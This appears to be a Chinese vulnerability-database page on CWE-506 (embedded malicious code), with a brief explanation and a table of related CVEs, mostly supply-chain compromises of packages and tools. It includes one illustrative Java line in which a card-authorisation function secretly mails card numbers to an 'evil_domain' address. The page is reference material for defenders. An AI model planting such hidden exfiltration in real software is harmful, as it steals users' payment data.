CWE-506 内嵌的恶意代码 类弱点 82 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-506指嵌入式恶意代码,属于软件内部植入的隐蔽后门或逻辑炸弹。攻击者通常利用开发者故意插入的代码,在特定条件触发时窃取数据或破坏系统,从而绕过正常安全机制。开发者应通过严格的代码审查、静态分析工具检测异常逻辑,并实施最小权限原则,确保代码来源可信且无未授权的后门植入,以从根本上杜绝此类内部威胁。
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2026-48027 | Nx Console 安全漏洞 — nx-console | - | - | 2026-05-27 |
| CVE-2026-8398 | Disc Soft DAEMON Tools Lite 安全漏洞 — DAEMON Tools Lite | 9.8 | Critical | 2026-05-15 |
| CVE-2026-44484 | PyTorch Lightning 安全漏洞 — pytorch-lightning | - | - | 2026-05-14 |
| CVE-2026-45321 | TanStack Query 安全漏洞 — arktype-adapter | 9.6 | Critical | 2026-05-12 |
| CVE-2026-6443 | WordPress plugin Accordion and Accordion Slider 安全漏洞 — Accordion and Accordion Slider | 9.8 | Critical | 2026-04-17 |
| CVE-2026-34424 | WordPress plugin Smart Slider 3 Pro 安全漏洞 — Smart Slider 3 Pro for WordPress | 9.8 | Critical | 2026-04-09 |
| CVE-2026-33634 | Aqua Security多款产品 安全漏洞 — setup-trivy | 7.4 | - | 2026-03-23 |
| CVE-2026-31976 | xygeni-action 安全漏洞 — xygeni-action | 8.8AI | HighAI | 2026-03-11 |
| CVE-2026-28353 | Trivy Action 安全漏洞 — trivy-vscode-extension | 5.5 | - | 2026-03-05 |
| CVE-2024-10938 | WordPress plugin OVRI Payment 安全漏洞 — OVRI Payment | 6.5 | Medium | 2026-02-27 |
| CVE-2025-59374 | ASUS Live Update 安全漏洞 — live update | 8.1AI | HighAI | 2025-12-17 |
| CVE-2018-25117 | Vesta Control Panel 安全漏洞 — Control Panel (CP) | 8.8AI | HighAI | 2025-10-15 |
| CVE-2017-20203 | NetSarang多款产品 安全漏洞 — Xmanager Enterprise | 10.0AI | CriticalAI | 2025-10-09 |
| CVE-2017-20202 | Web Developer for Chrome 安全漏洞 — Web Developer for Chrome | 8.8AI | HighAI | 2025-10-08 |
| CVE-2017-20201 | CCleaner和CCleaner Cloud 安全漏洞 — CCleaner | 9.8AI | CriticalAI | 2025-10-08 |
| CVE-2025-10894 | Nx 安全漏洞 | 9.6 | Critical | 2025-09-24 |
| CVE-2025-59145 | color-name 安全漏洞 — color-name | 6.1AI | MediumAI | 2025-09-15 |
| CVE-2025-59331 | node-is-arrayish 安全漏洞 — node-is-arrayish | 8.2AI | HighAI | 2025-09-15 |
| CVE-2025-59330 | node-error-ex 安全漏洞 — node-error-ex | 8.2AI | HighAI | 2025-09-15 |
| CVE-2025-59162 | color-convert 安全漏洞 — color-convert | 5.4AI | MediumAI | 2025-09-15 |
| CVE-2025-59142 | Color-String 安全漏洞 — color-string | 8.2AI | HighAI | 2025-09-15 |
| CVE-2025-59144 | debug 安全漏洞 — debug | 6.1AI | MediumAI | 2025-09-15 |
| CVE-2025-59143 | color 安全漏洞 — color | 6.1AI | MediumAI | 2025-09-15 |
| CVE-2025-59141 | simple-swizzle 安全漏洞 — node-simple-swizzle | 6.1AI | MediumAI | 2025-09-15 |
| CVE-2025-59140 | Backslash 安全漏洞 — node-backslash | 6.1AI | MediumAI | 2025-09-15 |
| CVE-2025-59039 | Prebid Universal Creative 安全漏洞 — prebid-universal-creative | 9.8AI | CriticalAI | 2025-09-09 |
| CVE-2025-59038 | Prebid.js 安全漏洞 — Prebid.js | 8.2AI | HighAI | 2025-09-09 |
| CVE-2025-59037 | DuckDB 安全漏洞 — duckdb-node | 9.1AI | CriticalAI | 2025-09-09 |
| CVE-2025-8217 | Amazon Q Developer Visual Studio Code extension 安全漏洞 — Q Developer VS Code Extension | 4.0 | Medium | 2025-07-30 |
| CVE-2025-54313 | eslint-config-prettier 安全漏洞 — eslint-config-prettier | 7.5 | High | 2025-07-19 |
CWE-506(内嵌的恶意代码) 是常见的弱点类别,本平台收录该类弱点关联的 82 条 CVE 漏洞。